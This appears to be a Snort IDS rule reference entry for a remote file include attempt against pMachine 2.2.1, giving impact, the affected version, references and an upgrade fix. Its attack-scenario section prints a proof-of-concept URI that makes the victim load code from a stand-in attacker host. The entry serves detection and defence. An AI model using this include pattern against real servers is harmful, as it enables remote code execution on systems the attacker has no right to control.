GEN:SID 1:2226
Message WEB-PHP pmachine remote file include attempt
Summary This event is generated when an attempt is made to exploit a known
vulnerability in the PHP application pmachine.
Impact Execution of arbitrary code possibly leading to a remote shell.
Detailed Information Versions of PMachine do not properly check included files and it is
possible for an attacker to include a file of their choosing which may
lead to arbitrary code execution on the target host.
Affected Systems PMachine PMachine 2.2.1
Attack Scenarios The attacker can include a file of their choosing by appending the file
URI to the end of a URI for the application.

Proof of concept URI by FrogMan:

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt
Ease of Attack Simple. No exploit software required.
Corrective Action Upgrade to the latest non-affected version of the software.
Additional References  
Rule References bugtraq: 7919
nessus: 11739